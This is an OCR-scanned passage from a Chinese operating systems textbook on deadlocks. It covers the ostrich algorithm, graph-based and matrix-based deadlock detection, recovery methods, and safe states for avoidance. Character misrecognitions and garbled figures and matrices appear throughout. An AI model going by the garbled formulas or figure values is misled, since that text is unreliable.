配给 B ， 这 样 B 被 挂 起 。 假 如 只 运行 进程 A 和 C， 那 么 资源 请 求 和 释放 的 过 程 会 如 图 6-4k 所 示 ， 而 不 是 如 
图 6-4d 所 示 。 这 一 过 程 的 资源 分 配 图 在 图 6-41 一 图 6-4q 中 给 出 ， 其 中 没有 死 锁 产生 。 

在 第 q 步 执行 完 后 ， 就 可 以 把 资源 S 分 配给 B 了 ， 因 为 A 已 经 完成 ， 而 且 C 获 得 了 它 所 需要 的 所 有 资 
源 。 尽 管 B 会 因为 请 求 T 而 等 待 ， 但 是 不 会 引起 死 锁 ，B 只 需要 等 待 C 结 束 。 

在 本 章 后 面 我 们 将 考察 一 个 具体 的 算法 ， 用 以 做 出 不 会 引起 死 锁 的 资源 分 配 决策 。 在 这 里 需要 说 明 
的 是 ， 资 源 分 配 图 可 以 用 作 一 种 分 析 工 具 ， 考 察 对 一 给 定 的 请 求 /释放 的 序列 是 否 会 引起 死 锁 。 只 需要 
按照 请 求 和 释放 的 次 序 一 步 步 进行 ， 每 一 步 之 后 都 检查 图 中 是 否 包括 了 环 路 。 如 果 有 环 路 ， 那 么 就 有 死 
锁 ， 反 之 ， 则 没有 死 锁 。 在 我 们 的 例子 中 ， 虽 然 只 和 同一 类 资源 有 关 ， 而 且 只 包含 一 个 实例 ， 但 是 上 面 
的 原理 完全 可 以 推广 到 有 多 种 资源 并 含有 若干 个 实例 的 情况 中 去 (Holt, 1972), 

总 而 言 之 ， 有 四 种 处 理 死 锁 的 策略 : 

1) 忽略 该 问题 。 也 许 如 果 你 忽略 它 ， 它 也 会 忽略 你 。 

2) 检测 死 锁 并 恢复 。 让 死 锁 发 生 ， 检 测 它们 是 否 发 生 ， 一 旦 发 生死 锁 ， 采 取 行 动 解决 问题 。 

3) 仔细 对 资源 进行 分 配 ， 动 态 地 避免 死 锁 。 

4) 通过 破坏 引起 死 锁 的 四 个 必要 条 件 之 一 ， 防 止 死 锁 的 产生 。 

下 面 四 市 将 分 别 讨论 这 四 种 方法 。 
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最 简单 的 解决 方法 是 驼 鸟 算法 : 把 头 埋 到 沙子 里 ， 假 装 根本 没有 问题 发 生 9 。 每 个 人 对 该 方法 的 看 
法 都 不 相同 。 数 学 家 认为 这 种 方法 根本 不 能 接受 ， 不 论 代 价 有 多 大 ， 都 要 彻底 防止 死 锁 的 产生 ， 工 程 师 
们 想 要 了 解 死 锁 发 生 的 频 度 、 系 统 因 各 种 原因 崩溃 的 发 生 次 数 以 及 死 锁 的 严重 性 。 如 果 死 锁 平均 每 5 年 
发 生 一 次 ， 而 每 个 月 系统 都 会 因 硬件 故障 、 编 译 器 错误 或 者 操作 系统 故障 而 崩溃 一 次 ， 那 么 大 多 数 的 工 
程 师 不 会 以 性 能 损失 和 可 用 性 的 代价 去 防止 死 锁 。 

为 了 能 够 让 这 一 对 比 更 具体 ， 考 虑 如 下 情况 的 操作 系统 当 一 个 open 系 统 调用 因 物 理 设备 〈 例 如 
蓝光 驱动 器 或 者 打印 机 ) 忙 而 不 能 得 到 响应 的 时 候 ， 操 作 系 统 会 阻塞 调用 该 系统 调用 的 进程 。 通 常 是 由 
设备 驱动 来 决定 在 这 种 情况 下 应 该 采取 何 种 措施 。 显 然 ， 阻 塞 或 者 返回 一 个 错误 代码 是 两 种 选择 。 如 果 
一 个 进程 成 功 地 打开 了 蓝光 驱动 器 ， 而 另 一 个 进程 成 功 地 打开 了 打印 机 ， 这 时 每 个 进程 都 会 试图 去 打开 
另外 一 个 设备 ， 系 统 会 阻塞 这 种 尝试 ， 从 而 发 生死 锁 。 现 有 系统 很 少 能 够 检测 到 这 种 死 锁 。 


6.4 死 锁 检测 和 死 锁 恢复 


第 二 种 技术 是 死 锁 检测 和 恢复 。 在 使 用 这 种 技术 时 ， 系 统 并 不 试图 阻止 死 锁 的 产生 ， 而 是 允许 死 锁 
发 生 ， 当 检测 到 死 锁 发 生 后 ， 采 取 措 施 进 行 恢复 。 本 节 我 们 将 考察 检测 死 锁 的 几 种 方法 以 及 恢复 死 锁 的 
几 种 方法 。 


日 这 一 民间 传说 毫 无 道理 。 能 鸟 每 小 时 跑 60 公 里 ， 为 了 得 到 一 顿 丰盛 的 晚餐 ， 它 一 脚 的 力量 足以 踢 死 一 头 狮子 。 
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6.4.1 每 种 类 型 一 个 资源 的 死 锁 检测 

我 们 从 最 简单 的 例子 开始 ， 即 每 种 资源 类 型 只 有 一 个 资源 。 这 样 的 系统 可 能 有 扫描 仪 、 蓝 光 光 盘 刻 
录 机 、 绘 图 仪 和 磁带 机 ， 但 每 种 设备 都 不 超过 一 个 ， 即 排除 了 同时 有 两 台 打 印 机 的 情况 。 稍 后 我 们 将 用 
另 一 种 方法 来 解决 两 台 打 印 机 的 情况 。 

可 以 对 这 样 的 系统 构造 一 张 资源 分 配 图 ， 如 图 6-3 所 示 。 如 果 这 张 图 包含 了 一 个 或 一 个 以 上 的 环 ， 
那么 死 锁 就 存在 。 在 此 环 中 的 任何 一 个 进程 都 是 死 锁 进程 。 如 果 没 有 这 样 的 环 ， 系 统 就 没有 发 生死 锁 。 

我 们 讨论 一 下 更 复杂 的 情况 ， 假 设 一 个 系统 包括 A 到 G 共 7 个 进程 ，R 到 W 共 6 种 资源 。 资 源 的 占有 情 
况 和 进程 对 资源 的 请 求情 况 如 下 : 

1) A 进程 持 有 R 资 源 ， 且 需要 5 资源 。 

2) B 进 程 不 持 有 任何 资源 ， 但 需要 T 资 源 。 

3) C 进 程 不 持 有 任何 资源 ， 但 需要 5 资源 。 

4) D 进 程 持 有 U 资 源 ， 且 需要 S 资 源 和 T 资 源 。 

5) E 进 程 持 有 T 资 源 ， 且 需要 V 资 源 。 

6) F 进 程 持 有 W 资 源 ， 且 需要 5 资源 。 

7) G 进 程 持 有 V 资 源 ， 且 需要 U 资 源 。 

问题 是 :“ 系 统 是 否 存 在 死 锁 ?如 果 存 在 的 话 ， 死 锁 涉及 了 哪些 进程 ”” 

要 回答 这 一 问题 ,我 们 可 以 构造 一 张 资源 分 配 图 ， 如 图 6-5a 所 示 。 可 以 直接 观察 到 这 张 图 中 包含 了 
一 个 环 ， 如 图 6-5b 所 示 。 在 这 个 环 中 ， 我 们 可 以 看 出 进程 D、E、G 已 经 死 锁 。 进 程 A、C、F 没 有 死 锁 ， 
这 是 因为 可 把 S 资 源 分 配给 它们 中 的 任 一 个 ， 而 且 它 们 中 的 任 一 进程 完成 后 都 能 释放 SS， 于 是 其 他 两 个 进 
程 可 依次 执行 ， 直 至 执行 完毕 。( 请 注意 ， 为 了 让 这 个 例子 更 有 趣 ， 我 们 允许 进程 D 每 次 请 求 两 个 资源 。) 
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图 6-5 a) 资源 分 配 图 ，b) 从 a 中 抽取 的 环 


虽然 通过 观察 一 张 简单 的 图 就 能 够 很 容易 地 找 出 死 锁 进程 ， 但 为 了 实用 ， 我 们 仍然 需要 一 个 正规 的 
算法 来 检测 死 锁 。 众 所 周知 ， 有 很 多 检测 有 向 图 环 路 的 方法 。 下 面 将 给 出 一 个 简单 的 算法 ， 这 种 算法 对 
有 向 图 进行 检测 ， 并 在 发 现 图 中 有 环 路 存在 或 确定 无 环 路 时 结束 。 这 一 算法 使 用 了 数据 结构 L，L 代 表 一 
些 节 点 的 集合 。 在 这 一 算法 中 ， 对 已 经 检查 过 的 弧 (有 向 边 ) 进行 标记 ， 以 免 重 复 检查 。 

通过 执行 下 列 步 又 完成 上 述 算法 

1) 对 图 中 的 每 一 个 节点 N， 将 N 作 为 起 始点 执行 下 面 5 个 步骤 。 

2) 将 L 初 始 化 为 空 表 ， 并 清除 所 有 的 有 向 边 标记 。 

3) 将 当前 节点 添加 到 工 的 尾部 ， 并 检测 该 节点 是 否 在 L 中 已 出 现 过 两 次 。 如 果 是 ， 那 么 该 图 包含 了 
一 个 环 (已 列 在 L 中 )， 算 法 结束 。 

4) 从 给 定 的 节点 开始 ， 检 测 是 否 存在 没有 标记 的 从 该 节点 出 发 的 弧 (有 向 边 )。 如 果 存 在 的 话 ， 做 
第 5 步 ， 如 果 不 存 在 ， 跳 到 第 6 步 。 

5) 随机 选取 一 条 没有 标记 的 从 该 节点 出 发 的 弧 〈 有 向 边 ) ， 标 记 它 。 然 后 顺 着 这 条 弧 线 找到 新 的 当 
前 节点 ， 返 回 到 第 3 步 。 

6) 如 果 这 一 节点 是 起 始 节点 ， 那 么 表明 该 图 不 存在 任何 环 ， 算 法 结束 。 否 则 意味 着 我 们 走 进 了 死 胡 
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同 ， 所 以 需要 移 走 该 节点 ， 返 回 到 前 一 个 节点 ， 即 当前 节点 前 面 的 一 个 节点 ， 并 将 它 作 为 新 的 当前 节点 ， 
同时 转 到 第 3 步 。 

这 一 算法 是 依次 将 每 一 个 节点 作为 一 棵 树 的 根 节点 ， 并 进行 深度 优先 搜索 。 如 果 碰 到 已 经 遇 到 过 的 
节点 ， 那么 就 算 找 到 了 一 个 环 。 如 果 从 任何 给 定 的 节点 出 发 的 弧 都 被 穷 举 了 ， 那 么 就 回溯 到 前 面 的 节点 。 
如 果 回 漳 到 根 并 且 不 能 再 深入 下 去 ， 那 么 从 当前 节点 出 发 的 子 图 中 就 不 包含 任何 环 。 如 果 所 有 的 节点 都 
是 如 此 ， 那 么 整个 图 就 不 存在 环 ， 也 就 是 说 系统 不 存在 死 锁 。 

为 了 验证 一 下 该 算法 是 如 何 工作 的 ， 我 们 对 图 6-5a 运 用 该 算法 。 算 法 对 节点 次 序 的 要 求 是 任意 的 ， 
所 以 可 以 选择 从 左 到 右 、 从 上 到 下 进行 检测 ， 首 先 从 R 节 点 开始 运行 该 算法 ， 然 后 依次 从 A、B、C、S、 
D、T、E、F 开 始 。 如 果 遇 到 了 一 个 环 ， 那 么 算法 停止。 

我 们 先 从 R 节 点 开始 ， 并 将 L 初 始 化 为 空 表 。 然 后 将 R 添 加 到 空 表 中 ， 并 移动 到 唯一 可 能 的 节点 A， 将 
它 添加 到 L 中 ， 变 成 L= 区 ，A]。 从 A 我 们 到 达 S， 并 使 L= 区 ，A，S]。S 没 有 出 发 的 弧 ， 所 以 它 是 条 死路 ， 迫 
使 我 们 回溯 到 A。 既 然 A 没 有 任何 没有 标记 的 出 发 弧 ， 我 们 再 回潮 到 R， 从 而 完成 了 以 R 为 起 始点 的 检测 。 

现在 我 们 重新 以 A 为 起 始点 启动 该 算法 ， 并 重 置 L 为 空 表 。 这 次 检索 也 很 快 就 结束 了 ， 所 以 我 们 又 
从 B 开 始 。 从 B 节 点 我 们 顺 着 弧 到 达 D， 这 时 L=[B，T，E，V，G，U，D]。 现 在 我 们 必须 随机 选择 。 如 
果 选 $ 点 ， 那 么 走 进 了 死胡同 并 回溯 到 D。 接 着 选 T 并 将 L 更 新 为 B，T，E，V，G，U，D,， T], 在 这 一 
点 上 我 们 发 现 了 环 ， 算 法 结束 。 

这 种 算法 远 不 是 最 佳 算 法 ， 较 好 的 一 种 算法 参见 (Even,1979) 。 但 毫 无 疑问 ， 该 实例 表明 确实 存在 
检测 死 锁 的 算法 。 


6.4.2 每 种 类 型 多 个 资源 的 死 锁 检测 

如 果 有 多 种 相同 的 资源 存在 ， 就 需要 采用 另 一 种 方法 来 检测 死 锁 。 现 在 我 们 提供 一 种 基于 矩阵 的 算 
法 来 检测 从 P1 到 P, 这 n 个 进程 中 的 死 锁 。 假 设 资源 的 类 型 数 为 m，E 代 表 资 源 类 型 1，E, 代 表 资 源 类 型 2， 
EE 代表 资源 类 型 i(1 <i<m)。E 是 现 有 资源 向 量 (existing resource vector) ， 代 表 每 种 已 存在 的 资源 总 数 。 
比如 ， 如 果 资 源 类 型 1 代表 磁带 机 ， 那 么 E,=2 就 表示 系统 有 两 台 磁 带 机 。 

在 任意 时 刻 ， 某 些 资 源 已 被 分 配 所 以 不 可 用 。 假 设 4 是 可 用 资源 向 量 (available resource vector), 
那么 4, 表示 当前 可 供 使 用 的 资源 数 ( 即 没 有 被 分 配 的 资源 ) 。 如 果 仅 有 的 两 台 磁 带 机 都 已 经 分 配 出 去 了 ， 
那么 4, 的 值 为 0。 

现在 我 们 需要 两 个 数组 : C 代 表 当 前 分 配 和 矩阵 (current allocation matrix) ，R 代 表 请 求 矩 阵 
(request matrix)。C 的 第 i 行 代表 P; 当前 所 持 有 的 每 一 种 类 型 资源 的 资源 数 。 所 以 ， Cu 代表 进程 ;所持 有 
的 资源 j 的 数量 。 同 理 ，R; 代表 P; 所 需要 的 资源 j 的 数量 。 这 四 种 数据 结构 如 图 6-6 所 示 。 


‘ois al 可 用 资源 

(E,, Ez, Ey, +, Em) (Ay, As, Az, …, An) 
当前 分 配 矩 阵 请 求 矩 阵 

Gi Cz Ca Cin Ri R Ra vas Rim 


Cu Ca Ca = Co By Ra Ra = Ba 
(> c, Ca c, pe Cn R, Ra R, oy Rn 
第 n 行 是 进程 n 当 前 已 分 配 到 的 资源 第 2 行 是 进程 2 需要 的 资源 

图 6-6 死 锁 检测 算法 所 需 的 四 种 数据 结构 


这 四 种 数据 结构 之 间 有 一 个 重要 的 恒等式 。 具 体 地 说 ， 某 种 资源 要 么 已 分 配 要 么 可 用 。 这 个 结论 意味 着 : 
Cth=E, 


换言之 ， 如 果 我 们 将 所 有 已 分 配 的 资源 j 的 数量 加 起 来 再 和 所 有 可 供 使 用 的 资源 数 相 加 ， 结 果 就 是 
该 类 资源 的 总 数 。 
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死 锁 检测 算法 就 是 基于 向 量 的 比较 。 我 们 定义 向 量 A 和 向 量 B 之 间 的 关系 为 4<B 以 表明 A 的 每 一 个 分 
量 要 么 等 于 要 么 小 于 和 8B 向量 相对 应 的 分 量 。 从 数学 上 来 说 ，A<B 当 且 仅 当 且 4;<B(0<i<m)。 

每 个 进程 起 初 都 是 没有 标记 过 的 。 算 法 开始 会 对 进程 做 标记 , 进程 被 标记 后 就 表明 它们 能 够 被 执行 ， 
\ 会 进入 死 锁 。 当 算法 结束 时 ， 任 何 设 有 标记 的 进程 都 是 死 锁 进程 。 该 算法 假定 了 一 个 最 坏 情 形 : 所 有 
的 进程 在 退出 以 前 都 会 不 停 地 获取 资源 。 

死 锁 检测 算法 如 下 : 

1) 寻找 一 个 没有 标记 的 进程 P,， 对 于 它 而 言 R 矩 阵 的 第 i 行 向 量 小 于 或 等 于 A。 

2) 如 果 找 到 了 这 样 一 个 进程 ， 那 么 将 C 和 矩阵 的 第 i 行 向 量 加 到 4A 中， 标记 该 进程 ， 并 转 到 第 1 步 。 

3) 如 果 没 有 这 样 的 进程 ， 那 么 算法 终止 。 

算法 结束 时 ， 所 有 没有 标记 过 的 进程 (如果 存在 的 话 ) 都 是 死 锁 进程 。 

算法 的 第 1 步 是 寻找 可 以 运行 完毕 的 进程 ， 该 进程 的 特点 是 它 有 资源 请 求 并 且 该 请 求 可 被 当前 的 可 
用 资源 满足 。 这 一 选中 的 进程 随后 就 被 运行 完毕 ， 在 这 段 时 间 内 它 释 放 自 己 持 有 的 所 有 资源 并 将 它们 返 
回 到 可 用 资源 库 中 。 然 后 ， 这 一 进程 被 标记 为 完成 。 如 果 所 有 的 进程 最 终 都 能 运行 完毕 的 话 ， 就 不 存在 
死 锁 的 情况 。 如 果 其 中 某 些 进程 一 直 不 能 运行 ， 那 么 它们 就 是 死 锁 进程 。 虽 然 算法 的 运行 过 程 是 不 确定 
的 (因为 进程 可 按 任何 行 得 通 的 次 序 执行 )， 但 结果 总 是 相同 的 。 

作为 一 个 例子 ， 在 图 6-7 中 展示 了 用 该 算法 检测 死 锁 的 工作 过 程 。 这 里 我 们 有 3 个 进程 、4 种 资源 
(可 以 任意 地 将 它们 标记 为 磁带 机 、 绘 图 仪 、 扫 描 仪 和 蓝光 光驱 )。 进 程 1/ 有 一 台 扫 描 仪 。 进 程 2 有 2 
台 磁 带 机 和 1 个 蓝光 光驱 。 进 程 3 有 1 个 绘图 仪 和 2 台 扫 描 仪 。 每 一 个 进程 都 需要 额外 的 资源 ， 如 和 矩阵 
R 所 示 。 

要 运行 死 锁 检测 算法 ， 首 先 找 出 哪 一 个 进程 的 资源 请 求 可 被 满足 。 第 1 个 不 能 被 满足 ， 因 为 没有 
CD-ROM 驱 动 器 可 供 使 用 。 由 于 没有 打印 机 空间 ， 第 2 个 也 不 能 被 满足 。 幸 运 的 是 ， 第 3 个 可 被 满足 ， 所 
以 进程 3 运行 并 最 终 释放 它 所 拥有 的 资源 ， 给 出 

A=(2220) 

接 下 来 ， 进 程 2 也 可 运行 并 释放 它 所 拥有 的 资源 ， 给 出 

A=(4221) 


现在 剩 下 的 进程 都 能 够 运行 ， 所 以 这 个 系统 中 不 存在 死 锁 。 


假设 图 6-7 的 情况 有 所 改变 。 进 程 2 需要 1 个 蓝光 er $ eae a 
光驱 、2 台 磁带 机 和 1 人 台 绘 图 仪 。 在 这 种 情况 下 ， 所 2 Se 
有 的 请 求 都 不 能 得 到 满足 ， 整 个 系统 进入 死 锁 . 即 SY OS rey 
使 我 们 能 给 进程 3 两 个 磁带 驱动 器 和 一 个 绘图 机 ， ‘4 2 3 1) Be A D o 
但 是 系统 依然 会 在 进程 3 请 求 蓝光 光驱 的 时 候 发 生 
死 锁 。 当前 分 配 和 矩阵 请 求 矩 阵 
现在 我 们 知道 了 如 何 检测 死 锁 (至 少 是 在 这 种 c-| o 1 ‘| | o 0 | 
预先 知道 静态 资源 请 求 的 情况 下 ) ， 但 问题 在 于 何 时 0120 2100 
去 检测 它们 。 一 种 方法 是 每 当 有 资源 请 求 时 去 检测 ， 图 6.7 死 锁 检测 算法 的 一 个 例子 


毫 无 疑问 越 早 发 现 越 好 ， 但 这 种 方法 会 占用 昂贵 的 
CPU 时 间 ， 另 一 种 方法 是 每 隔 /分 钟 检 测 一 次 ， 或 者 当 CPU 的 使 用 率 降 到 某 一 域 值 时 去 检测 。 考 虑 到 CPU 
使 用 效率 的 原因 ， 如 果 死 锁 进程 数 达 到 一 定数 量 ， 就 没有 多 少 进程 可 运行 了 ， 所 以 CPU 会 经 常 空闲 。 


6.4.3 从 死 锁 中 恢复 

假设 我 们 的 死 锁 检测 算法 已 成 功 地 检测 到 了 死 锁 ， 那 么 下 一 步 该 怎么 办 ? 当然 需要 一 些 方法 使 系统 重 
新 正常 工作 。 在 本 小 节 中 ， 我 们 会 讨论 各 种 从 死 锁 中 恢复 的 方法 ， 尽 管 这 些 方法 看 起 来 都 不 那么 令 人 满意 。 

1. 利用 抢占 恢复 

在 某 些 情况 下 ， 可 能 会 临时 将 某 个 资源 从 它 的 当前 所 有 者 那里 转移 给 另 一 个 进程 。 许 多 情况 下 ， 尤 
其 是 对 运行 在 大 型 主机 上 的 批 处 理 操作 系统 来 说 ， 需 要 人 工 进行 干预 。 


死 鳃 255 


比如 ， 要 将 激光 打印 机 从 它 的 持 有 进程 那里 拿 走 ， 管 理 员 可 以 收集 已 打印 好 的 文档 并 将 其 堆积 在 一 
旁 。 然 后 ， 该 进程 被 挂 起 (标记 为 不 可 运行 )。 接 着 ,打印 机 被 分 配给 另 一 个 进程 。 当 那个 进程 结束 后 ， 
堆 在 一 旁 的 文档 再 被 重新 放 回 原 处 ， 原 进程 可 重新 继续 工作 。 

在 不 通知 原 进程 的 情况 下 ， 将 某 一 资源 从 一 个 进程 强行 取 走 给 另 一 个 进程 使 用 ， 接 着 又 送 回 ， 这 种 
做 法 是 否 可 行 主要 取决 于 该 资源 本 身 的 特性 。 用 这 种 方法 恢复 通常 比较 困难 或 者 说 不 太 可 能 。 若 选择 挂 
起 某 个 进程 ， 则 在 很 大 程度 上 取决 于 哪 一 个 进程 拥有 比较 容易 收回 的 资源 。 

2. 利用 回 滚 恢复 

如 果 系 统 设计 人 员 以 及 主机 操作 员 了 解 到 死 锁 有 可 能 发 生 ， 他 们 就 可 以 周期 性 地 对 进程 进行 检查 点 
检查 (checkpointed)。 进 程 检查 点 检查 就 是 将 进程 的 状态 写 入 一 个 文件 以 备 以 后 重启 。 该 检查 点 中 不 仅 包 
括 存 储 映 像 ， 还 包括 了 资源 状态 ， 即 哪些 资源 分 配给 了 该 进程 。 为 了 使 这 一 过 程 更 有 效 ， 新 的 检查 点 不 
应 覆盖 原 有 的 文件 ， 而 应 写 到 新 文件 中 。 这 样 ， 当 进程 执行 时 ， 将 会 有 一 系列 的 检查 点 文件 被 累积 起 来 。 

一 旦 检测 到 死 锁 ， 就 很 容易 发 现 需要 哪些 资源 。 为 了 进行 恢复 ， 要 从 一 个 较 早 的 检查 点 上 开始 ， 这 
样 拥有 所 需要 资源 的 进程 会 回 滚 到 一 个 时 间 点 ， 在 此 时 间 点 之 前 该 进程 获得 了 一 些 其 他 的 资源 。 在 该 检 
查 点 后 所 做 的 所 有 工作 都 丢失 。( 例 如 ， 检 查 点 之 后 的 输出 必须 丢弃 ， 因 为 它们 还 会 被 重新 输出 。) 实际 
上 ， 是 将 该 进程 复位 到 一 个 更 早 的 状态 ， 那 时 它 还 没有 取得 所 需 的 资源 ， 接 着 就 把 这 个 资源 分 配给 一 个 
死 锁 进程 。 如 果 复 位 后 的 进程 试图 重新 获得 对 该 资源 的 控制 ， 它 就 必须 一 直 等 到 该 资源 可 用 时 为 止 。 

3. 通过 杀 死 进程 恢复 

最 直接 也 是 最 简单 的 解决 死 锁 的 方法 是 杀 死 一 个 或 若干 个 进程 。 一 种 方法 是 杀 掉 环 中 的 一 个 进程 。 如 
果 走 运 的 话 ， 其 他 进程 将 可 以 继续 。 如 果 这 样 做 行 不 通 的 话 ， 就 需要 继续 杀 死 别 的 进程 直到 打破 死 锁 环 。 

另 一 种 方法 是 选 一 个 环 外 的 进程 作为 牺牲 品 以 释放 该 进程 的 资源 。 在 使 用 这 种 方法 时 ， 选 择 一 个 要 
被 杀 死 的 进程 要 特别 小 心 ， 它 应 该 正好 持 有 环 中 某 些 进程 所 需 的 资源 。 比 如 ， 一 个 进程 可 能 持 有 一 台 绘 
图 仪 而 需要 一 台 打 印 机 ”而 另 一 个 进程 可 能 持 有 一 台 打 印 机 而 需要 一 台 绘 图 仪 ， 因 而 这 两 个 进程 是 死 锁 
的 。 第 三 个 进程 可 能 持 有 另 一 台 同 样 的 打印 机 和 另 一 台 同 样 的 绘图 仪 而 且 正在 运行 着 。 杀 死 第 三 个 进程 
将 释放 这 些 资源 ， 从 而 打破 前 两 个 进程 的 死 锁 。 

有 可 能 的 话 ， 最 好 杀 死 可 以 从 头 开始 重新 运行 而 且 不 会 带 来 副作用 的 进程 。 比 如 ， 编 译 进 程 可 以 被 
重复 运行 ， 由 于 它 只 需要 读 入 一 个 源 文件 和 产生 一 个 目标 文件 。 如 果 将 它 中 途 杀 死 ， 它 的 第 一 次 运行 不 
会 影响 到 第 二 次 运行 。 

另 一 方面 ， 更 新 数据 库 的 进程 在 第 二 次 运行 时 并 非 总 是 安全 的 。 如 果 一 个 进程 将 数据 库 的 某 个 记录 
加 1， 那 么 运行 它 一 次 ， 将 它 杀 死 后 ， 再 次 执行 ， 就 会 对 该 记录 累计 加 2， 这 显然 是 错误 的 。 


6.5 死 锁 避免 

在 讨论 死 锁 检测 时 ， 我 们 假设 当 一 个 进程 请 求 资源 时 ， 它 一 次 就 请 求 所 有 的 资源 ( 见 图 6-6 中 的 矩 
阵 R) 。 不 过 在 大 多 数 系统 中 ， 一 次 只 请 
求 一 个 资源 。 系 统 必 须 能 够 判断 分 配 资 
源 是 否 安全 ， 并 且 只 能 在 保证 安全 的 条 
件 下 分 配 资 源 。 问 题 是 : 是 否 存在 一 种 
算法 总 能 做 出 正确 的 选择 从 而 避免 死 
锁 ? 答案 是 肯定 的 ， 但 条 件 是 必须 事先 
获得 一 些 特定 的 信息 。 本 节 我 们 会 讨论 


B cu (两 个 进程 都 完成 ) 








几 种 死 锁 避免 的 方法 。 
6.5.1 资源 轨迹 图 
避免 死 锁 的 主要 算法 是 基于 一 个 安 q 
全 状态 的 概念 。 在 描述 算法 前 ， 我 们 先 打印 机 





讨论 有 关 安 全 的 概念 。 通 过 图 的 方式 ， nate. ai 
能 更 容易 理解 。 虽 然 图 的 方式 不 能 被 直 图 6-8 两 个 进程 的 资源 轨迹 图 
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接 翻 译 成 有 用 的 算法 ， 但 它 给 出 了 一 个 解决 问题 的 直观 感受 。 

在 图 6-8 中 ， 我 们 看 到 一 个 处 理 两 个 进程 和 两 种 资源 (打印 机 和 绘图 仪 ) 的 模型 。 横 轴 表 示 进 程 A 执 
行 的 指令 ， 纵 轴 表 示 进 程 B 执 行 的 指令 。 进 程 A 在 I 处 请 求 一 台 打印 机 ， 在 I 处 释放 ， 在 I 处 请 求 一 
图 仪 ， 在 1, 处 释放 。 进 程 B 在 Is 到 了 之 间 需 要 绘图 仪 ， 在 I 到 Is 之 间 需 要 打印 机 。 

图 6-8 中 的 每 一 点 都 表示 出 两 个 进程 的 连接 状态 。 初 始点 为 p， 设 有 进程 执行 任何 指令 。 如 果 调 度 程 
序 选 中 A 先 运行 ， 那 么 在 A 执行 一 段 指令 后 到 达 q， 此 时 B 没 有 执行 任何 指令 。 在 q 点 ， 如 果 轨 迹 沿 垂直 方 
向 移动 ， 表 示 调 度 程序 选中 B 运 行 。 在 单 处 理 机 情况 下 ， 所 有 路 径 都 只 能 是 水 平 或 垂直 方向 的 ， 不 会 出 
现 斜 向 的 。 因 此 ， 运 动 方向 一 定 是 向 上 或 向 右 ， 不 会 向 左 或 向 下 ， 因 为 进程 的 执行 不 可 能 后 退 。 

当 进 程 A 由 r 向 s 移 动 穿 过 I 线 时 ， 它 请 求 并 获得 打印 机 。 当 进程 B 到 达 t 时 ， 它 请 求 绘图 仪 。 

图 中 的 阴影 部 分 是 我 们 感 兴趣 的 ， 画 着 从 左下 到 右上 和 斜 线 的 部 分 表示 在 该 区 域 中 两 个 进程 都 拥有 打 
印 机 ， 而 互 斥 使 用 的 规则 决定 了 不 可 能 进入 该 区 域 。 另 一 种 斜 线 的 区 域 表 示 两 个 进程 都 拥有 绘图 仪 ， 且 
同样 不 可 进入 。 

如 果 系 统一 旦 进入 由 I,、Is 和 Is、I6 组 成 的 矩形 区 域 ， 那 么 最 后 一 定 会 到 达 I, 和 I6 的 交叉 点 ， 这 时 就 产 
生死 锁 。 在 该 点 处 ，A 请 求 绘图 仪 ，B 请 求 打印 机 ， 而 且 这 两 种 资源 均 已 被 分 配 。 这 整个 矩形 区 域 都 是 
不 安全 的 ， 因 此 决 不 能 进入 这 个 区 域 。 在 点 t 处 唯一 的 办 法 是 运行 进程 A 直到 I4,， 过 了 I 后 ， 可 以 按 任何 
路 线 前 进 ， 直 到 终点 u。 

需要 注意 的 是 ， 在 点 t 进 程 B 请 求 资源 。 系 统 必 须 决定 是 否 分 配 。 如 果 系 统 把 资源 分 配给 B， 系 统 进 
入 不 安全 区 域 ， 最 终 形成 死 锁 。 要 避免 死 锁 ， 应 该 将 B 挂 起 ， 直 到 A 请 求 并 释放 绘图 仪 。 


6.5.2 安全 状态 和 不 安全 状态 

我 们 将 要 研究 的 死 锁 避免 算法 使 用 了 图 6-6 中 的 有 关 信 息 。 在 任何 时 刻 ， 当 前 状态 包括 了 E、A、C 
和 R。 如 果 没 有 死 锁 发 生 ， 并 且 即 使 所 有 进程 突然 请 求 对 资源 的 最 大 需求 ， 也 仍然 存在 某 种 调度 次 序 能 
够 使 得 每 一 个 进程 运行 完毕 ， 则 称 该 状态 是 安全 的 。 通 过 使 用 一 个 资源 的 例子 很 容易 说 明 这 个 概念 。 在 
图 6-9a 中 有 一 个 A 拥 有 3 个 资源 实例 但 最 终 可 能 会 需要 9 个 资源 实例 的 状态 。B 当 前 拥有 2 个 资源 实例 ， 将 
来 共 需 要 4 个 资源 实例 。 同 样 ，C 拥 有 2 个 资源 实例 ， 还 需要 另外 5 个 资源 实例 。 总 共有 10 个 资源 实例 ， 其 
中 有 7 个 资源 已 经 分 配 ， 还 有 3 个 资源 是 空闲 的 。 


已 有 最 大 已 有 最 大 已 有 最 大 已 有 最 大 已 有 最 大 
数量 需求 数量 需求 a 四 数量 需求 数量 需求 
alajo] [als] 9 | [Al|s|。| [As|9| 
[Is|214| [ef4]4] DOA Islol-| [elo] -| 
ketar] eist] bejelz] EEA ES] 
空闲 : 3 1 空闲 : 5 0 ZA: 7 
a) c) e) 


图 6-9 说 明 a 中 的 状态 为 安全 状态 


图 6-9a 的 状态 是 安全 的 ， 这 是 由 于 存在 一 个 分 配 序列 使 得 所 有 的 进程 都 能 完成 。 也 就 是 说 ， 这 个 方 
案 可 以 单独 地 运行 B， 直 到 它 请 求 并 获得 另外 两 个 资源 实例 ， 从 而 到 达 图 6-9b 的 状态 。 当 B 完 成 后 ， 就 到 
达 了 图 6-9c 的 状态 。 然 后 调度 程序 可 以 运行 C， 再 到 达 图 6-9d 的 状态 。 当 C 完 成 后 ， 到 达 了 图 6-9e 的 状态 。 
现在 A 可 以 获得 它 所 需要 的 6 个 资源 实例 ， 并 且 完 成 。 这 样 系统 通过 仔细 的 调度 ， 就 能 够 避免 死 锁 ， 所 以 
图 6-9a 的 状态 是 安全 的 。 

现在 假设 初始 状态 如 图 6-10a 所 示 。 但 这 次 A 请 求 并 得 到 另 一 个 资源 ， 如 图 6-10b 所 示 。 我 们 还 能 找到 
一 个 序列 来 完成 所 有 工作 吗 ? 我 们 来 试 一 试 。 调 度 程序 可 以 运行 B， 直 到 B 获 得 所 需 资源 ， 如 图 6-10c 所 示 。 

最 终 ， 进 程 B 完 成 ， 状 态 如 图 6-10d 所 示 ， 此 时 进入 困境 了 。 只 有 4 个 资源 实例 空闲 ， 并 且 所 有 活动 
进程 都 需要 5 个 资源 实例 。 任 何 分 配 资源 实例 的 序列 都 无 法 保证 工作 的 完成 。 于 是 ， 从 图 6-10a 到 图 6-10b 
